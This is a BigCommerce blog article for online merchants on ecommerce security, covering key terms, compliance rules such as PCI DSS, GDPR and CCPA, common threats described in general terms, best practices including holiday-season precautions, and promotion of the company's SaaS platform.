What You Need to Know About Securing Your Ecommerce Site Against Cyber Threats
Get The Print Version
Tired of scrolling? Download a PDF version of our website security article for easier offline reading and sharing with coworkers.
Ecommerce sites will always be a hot target for cyberattacks. For would-be thieves, they are treasure troves of personal and financial data. And for businesses of all sizes, the cost of a breach both in loss of data and in customer trust can be hugely damaging for businesses of all sizes.
Ecommerce business owners are all too aware of these issues and are increasing their security measures. The VMWare Carbon Black 2020 Cybersecurity Outlook Report found that 77% of businesses surveyed had purchased new security products in the last year and 69% had increased security staff.
In this constant game of cat and mouse, as online retailers add increasingly innovative technologies to their sites to stay competitive, cyber attackers are equally honing their skills and finding new vulnerabilities to exploit. The best way to stay ahead is to be aware of ecommerce security best practices and the types of attacks to be on the look out for.
What is Ecommerce Security?
The frequency and sophistication of cyber attacks has skyrocketed in recent years. Ecommerce security refers to the measures taken to protect your business and your customers against cyber threats.
Let’s look at some terminology and common acronyms you should know:
Payment Card Industry Data Security Standard (PCI DSS).
PCI DSS (often referred to as just “PCI”) is an industry standard that ensures credit card information collected online is being transmitted and stored in a secure manner.
International Organization for Standardization (ISO).
ISO is an international standard-setting body that creates requirements that guide businesses in making sure their products and processes are fit for purpose. One of their standards, ISO/IEC 27001:2013, covers data security. Achieving this certification means a business has high-quality management systems, data security, risk-aversion strategies, and standardized business practices.
Personal data or personal information refers to any data that can be linked back to a specific individual — most simply, this includes names, email addresses, and phone numbers. But it can get a little bit more complex as well. Any data set — even scrubbed of specific names or numbers — that can identify a particular person is considered personal data. Protecting personal data is particularly important when it comes to data privacy regulations like GDPR (more on that later).
Transport Layer Security (TLS), Secure Sockets Layer (SSL), and HTTPS authentication.
Utilizing SSL helps to authenticate and encrypt links between networked computers. Once you have an SSL certificate for your ecommerce site, you can move from HTTP to HTTPS, which serves as a trust signal to customers that your site is secure.
Multi-factor authentication (MFA), 2-factor authentication (2FA), or 2-step verification (2SV).
MFA, 2FA, and 2SV are sometimes used interchangeably — and they are similar — but there are differences among them. In addition to entering a username and password, all three of these methods require at least one further method of identity verification of a user logging in to a site — like your ecommerce store.
Here’s a high-level explanation of the differences:
- 2SV may require the user to enter a one-time code, delivered via an email, text message, or phone call.
- 2FA goes a step further and may require the user to acknowledge their login attempt through another device, like opening a specific app on a mobile device while logging in from a laptop.
- MFA is similar to 2FA but can refer to the implementation of more than two factors of authentication.
Distributed Denial of Service (DDoS).
A DDoS attack refers to a disruption of server, service, or network traffic by overwhelming it with a flood of traffic. This resource on Cloudflare, which offers more detailed information on DDoS attacks, compares it to a traffic jam. Imagine trying to pull out into a major roadway (those are your customers and legitimate traffic) during rush hour — all those cars are the compromised traffic, blocking customers out of your store.
Malware and ransomware.
Malware, or “malicious software,” is software that attackers install on your system. Ransomware is a type of malware that locks the victim out of their system, or prevents access to data, until a ransom is paid to the attacker. Here are a few symptoms you may experience if your system becomes infected:
- Links take you to the wrong page destination.
- New toolbars or buttons appear in your browser, or new icons show up on your desktop.
- You experience a near-constant barrage of ad pop-ups.
- Your system is slow or repeatedly crashes, or your browser freezes frequently and becomes unresponsive.
- Your emails keep bouncing.
What is Compliance, and How is it Different From Security?
The concepts of compliance and cybersecurity are often used interchangeably — and in some ways, they are related. But there are some important differences.
Compliance refers to the ability to meet a specific set of standards set out by governments or private institutions, and there can be legal repercussions for not complying. But meeting those compliance standards does not necessarily mean your ecommerce site is fully secure. (Note that there are many compliance standards that your business may be required to meet. We are only discussing several of the major, cybersecurity-related regulations.)
Payment Card Industry Data Security Standard (PCI-DSS).
Any business that manages credit card transactions must comply with the PCI-DSS requirements around the protection of cardholder data, no matter their revenue or credit card transaction volumes. These data security standards are defined by the PCI Security Standards Council (PCI SSC) and enforced by credit card companies.
General Data Protection Regulation (GDPR).
GDPR is a relatively recent law enacted in the European Union to ensure the protection of European Economic Area (EEA) citizens’ personal data and privacy. And it doesn’t just apply to businesses in the EU. If you sell products internationally to any of these citizens, you will need to comply with GDPR as you handle any of their data.
California Consumer Privacy Act (CCPA).
After GDPR was implemented in the EU, the state of California began to move toward implementing its own data protection law. The deadline for businesses working with or employing California residents to comply with CCPA is January 1, 2020.
The spirit of CCPA is similar to GDPR in that it is dedicated to protecting the data and privacy of private citizens, but there are a few important differences. While this is the most recent and farthest-reaching data protection standard in the U.S., at least 15 other states have some type of personal privacy or data protection standards.
The Biggest Security Threats to Your Ecommerce Site
The types and methods of cyber attack are broad and varied, and it would be almost impossible to delve into them all in one blog post. But there are some that rise to the top as the most important to know about for strong ecommerce security.
Phishing is a type of social engineering, and refers to methods used by attackers to trick victims — typically via email, text, or phone — into providing private information like passwords, account numbers, social security numbers, and more.
BigCommerce Note: BigCommerce will never send you an email with a link to update your store or your login credentials. If you receive an email, phone call, or text from “BigCommerce” in which personal information is requested, contact customer support directly for validation.
Malware and ransomware.
When your device or network becomes infected with malware or ransomware — a type of malware — you may be locked out of all your important data and systems. Downtime is expensive, but regular backups of your site data can help keep this from being a devastating blow to your business. And by not clicking on suspicious links or installing unknown software on a computer, you can be better protected against attacks.
You may be at risk if your ecommerce site insecurely stores data in a SQL database. If not properly validated, a malicious query injected into a packaged payload can give the attacker access to view and even manipulate any information in a database.
Cross-site scripting (XSS).
E-skimming refers to a method of stealing credit card information and personal data from payment card processing pages on ecommerce sites. Attackers gain access to your site either via a successful phishing attempt, brute force attack, XSS, or third-party compromise, then capture in real time the payment information your shoppers enter into the checkout page.
Best Practices for Ecommerce Security
The compliance standards mentioned above aren’t going away. In fact, trends in privacy concerns indicate that we should expect more regulations in the future as people of all ages are increasingly concerned with where their data is going.
This Data Breach Investigations Report dives deeper into trends in retail cyber attacks. Payment information is shown to be the prominent target, and ecommerce attacks continue to rise as point-of-sale breaches and card skimmers are, overall, declining.
If a security breach of your ecommerce site leads to a loss of customer data, the associated fines — and hit to your brand reputation — could be devastating.
1. Implement strong, unique passwords — and help make sure your customers do, too.
According to the 2020 Verizon Data Breach Investigations Report, 37% of credential theft breaches used stolen or weak credentials. It’s worth the extra effort to make sure you, your employees, and your customers implement good practices for strong passwords:
- Strong passwords are at least eight characters and contain upper and lowercase letters, numbers, and symbols.
- Passwords should never be shared — each user should have his or her own unique, private username and password for login.
- Never use the same password for other login credentials as you use for your ecommerce site.
- Consider using a password manager.
- Never publicly share sensitive information like your date of birth, social security number, or any other info you may use as answers to security questions.
“Do not use any form of the default admin name provided. Attackers write scripts that run day and night trying over and over to log in to the admin panel, if you’ve used anything similar to “admin”, they are more likely to crack it.”
— Jason Simmons, CEO, Dead Soxy
Protect your devices.
Whether you’ve got one computer in a home office or a headquarters with a full networked computer system, make sure your connected devices are cyber secure with anti-virus software, firewalls, or another appropriate method of protecting against threats.
Steel against social engineering attempts.
One of the best ways to avoid malware infections is to avoid falling into the phishing traps. Never provide any level of personal information unless you have verified the identity of the recipient. Additionally, no legitimate organization will ever ask you to share your password.
Never click links in suspicious emails, as they may take you to a webpage that is made to look like a familiar login page but serves instead to steal your information. And do not download any attachments that you were not already expecting.
There are a few ways to distinguish phishing attempts from legitimate emails; here’s what to look for:
- Obvious spelling and grammatical mistakes in the subject line or body of an email could indicate a suspicious sender.
- Look closely at the domain of the email sender. They are often made to look like a familiar domain but are off by just one letter (e.g., BigCommerce.com could become BgCommerce.com).
- The same goes for any URLs you might click. At first glance, they may appear legitimate, but the spelling could be off by one letter in the hopes you don’t notice and click anyway to a dangerous domain.
- Suspicious emails may ask you to do something like transfer money or authorize a charge, and offer an excuse for why it must be done immediately.
Implement additional authentication factors.
It may feel like a burden at times, but using 2-step verification, 2-factor authentication, or multi-factor authentication gives you further assurance that you and your authorized users are the only people logging into your store. Considering the potential consequences of a breach, it’s worth it.
Only store the customer data that you need.
When it comes to storing data, the bottom line is to never hold on to more than you need to optimally conduct your business. But in deciding what exactly that means for you, there are a lot of factors to consider.
Particularly with the growing number of data privacy regulations, it’s important to carefully establish your own business’ philosophy to balance customer experience, business convenience, and security.
“Always keep your customers’ critical data separate from other information by segmenting your network. Deploy firewalls and conduct audits to ensure that all of your security measures are functioning the way they are supposed to.”
— Shane Barker, ShaneBarker.com
Make sure your site is always up to date.
Security is a continuous cat-and-mouse game. Attackers identify vulnerabilities; software engineers patch them. If you are using a SaaS ecommerce platform like BigCommerce, updates to your software are taken care of automatically. But with on-premises ecommerce solutions, your business is responsible for implementing any updates, bug fixes, or vulnerability patches to the software that powers your store.
“With our previous ecommerce platform, there were ongoing security updates that we had to manually install which would always “break” something else. We had to create a secondary sandbox site to test security updates prior to uploading to our live site. As you can imagine, this was not ideal.”
— Billy Thompson, President – Thompson Tee
Switch to HTTPS.
Secure HTTPS hosting, which requires an SSL certificate, will help secure your website. It’s also a boon for your marketing department because Google penalizes websites with HTTP in organic search rankings. HTTPS sends a positive trust signal to your shoppers — particularly the digitally savvy.
Back up your data.
If you are breached and lose access to your data, you are going to want a backup to help you get your business back up and running as quickly as possible.
Regularly review all plugins and third-party integrations.
Take an inventory of all the third-party solutions you’re running within your store. Make sure that you know what they are and assess your continued level of trust in that third party. If you’re no longer using them, remove that integration from your store. The idea is to allow the fewest number of parties to have access to your customers’ data, while still driving your business forward.
Double Down on Security During the Holiday Season
The holiday season is, unfortunately, a time you can expect higher volumes of attempted fraud and cyber crime. Everyone is really busy, and there are huge spikes in traffic on ecommerce sites, making anomalous behavior more difficult to protect. Attackers know this — and see it as an opportunity.
Here are some things you can do to ensure website security through the holidays:
Do a pre-holiday security check.
“The holiday season is the time when a good majority of ecommerce cyber-attacks take place, taking advantage of the holiday rush. Retailers should prepare for this in advance and conduct a thorough security check before the holiday season starts. This should include checking for malware in point-of-sale systems and improving the security of web servers.”
— Shane Barker, ShaneBarker.com
Your holiday security audit should also include an examination of who has access to what:
“Make sure to review admin-level accounts and privileges for your store, marketing software, and other tools. Disable or delete unused accounts. Update permissions to reflect the actual workflows for particular users.”
— Jordan Brannon, President, Coalition Technologies
Increase your fraud protection.
A steep spike in shoppers is often accompanied by an increase in fraudulent activity. According to the TransUnion Holiday Retail Fraud Survey from 2019, 46% of customers are concerned about being the victim of fraud when shopping this holiday season.
“Another form of cyber risk and one of the biggest risks to ecommerce brands today is the chargeback scam. Attackers acquire credit card information along with credentials and go on a spending spree. The retailer gets an order and ships it not thinking twice about it. Only to receive a chargeback at some point in the future because the charge was marked as fraud. The retailer can’t argue and is forced to refund the order and the goods are long gone. This is even compounded more with loyalty programs and gift cards.
This type of cyber fraud is very hard to prevent. After losing 1000s in merchandise we started using the Eye4fraud.com app for BigCommerce. The app tells us in real time if each order should be shipped or not and offers a guarantee for any chargeback.”
— Jason Simmons, CEO, Dead Soxy
Prepare your customer service team.
Make sure you and your team are prepared for common threats — including having a clear process for verifying the identity of customers who request any changes to their orders or accounts.
Have a security update plan.
It’s good advice to get your store pretty much locked down for the holidays and not make too many changes to it, just to avoid the extra risk that that can entail. But that general guideline does not apply when it comes to security, and patching your site for any vulnerabilities. This is mostly applicable if you have an on-premise ecommerce solution (BigCommerce merchants can breathe easy!). You need to have a tried and true plan for site updates if they become necessary to ensure the security of your business and your shoppers.
How BigCommerce Helps Secure Your Business
Each and every part of the BigCommerce platform is built with security in mind. Our multi-tenant SaaS ecommerce platform helps to lower your total cost of ownership; your organization is not responsible for maintaining servers, installing updates or patching the servers when security vulnerabilities are discovered.
The benefits of SaaS.
Best-in-class SaaS applications like BigCommerce provide robust layers of security as well as the rigorous fraud prevention, information security standards, and compliance frameworks. And updates and security patching are handled by the SaaS provider, taking some of the burden off of its users.
With a move to Google Cloud Platform, BigCommerce’s security benefits have only increased, providing merchants with additional security measures including best-in-class protection against DDoS attacks.
In addition, BigCommerce maintains PCI compliance on behalf of merchants and is ISO 27001-certified by the international standard outlining best practices for information security management systems.
“PCI requirements, complexity, and cost are increasing constantly. Mitigating this virtually requires a shift to SaaS.”
— Jason Greenwood, Director – Solutions & Delivery, Moustache Republic
Security and privacy by design.
BigCommerce takes both security and privacy very seriously, baking both into the way we build our products and interface with customers. We go a step further and put boundaries around how we interact with a merchant’s data.
Our merchants’ data and customers belong to them and only them. To keep your customers’ payment information as secure as possible, sensitive payment data is encrypted in transit and does not come to rest on BigCommerce’s infrastructure.
Developing good ecommerce security is vitally important to the success of your business. You can’t afford to lose your customers’ trust by exposing their personal data. By using a SaaS platform like BigCommerce, you get the benefits of spending more time growing your business — and less time worrying about security monitoring and maintenance.
But that doesn’t mean there’s nothing for you to do. Practicing good password hygiene, staying mindful about clicking links and downloading attachments from your email, and regularly reviewing your third-party integrations are particularly important, even for merchants on our secure SaaS platform.
By following the tips in this post and staying aware of what’s happening in the cybersecurity landscape, you can provide your customers with a shopping experience they can trust.
Read more about security in SaaS with this technical deep dive.
This material does not constitute legal, tax, professional or financial advice and BigCommerce disclaims any liability with respect to this material. Please consult your attorney or professional advisor on specific legal, professional or financial matters.
Less Development. More Marketing.
Let us future-proof your backend. You focus on building your brand.
Are Security Concerns Keeping You From Diving Into SaaS?
Read our technical deep dive on SaaS security for ecommerce businesses.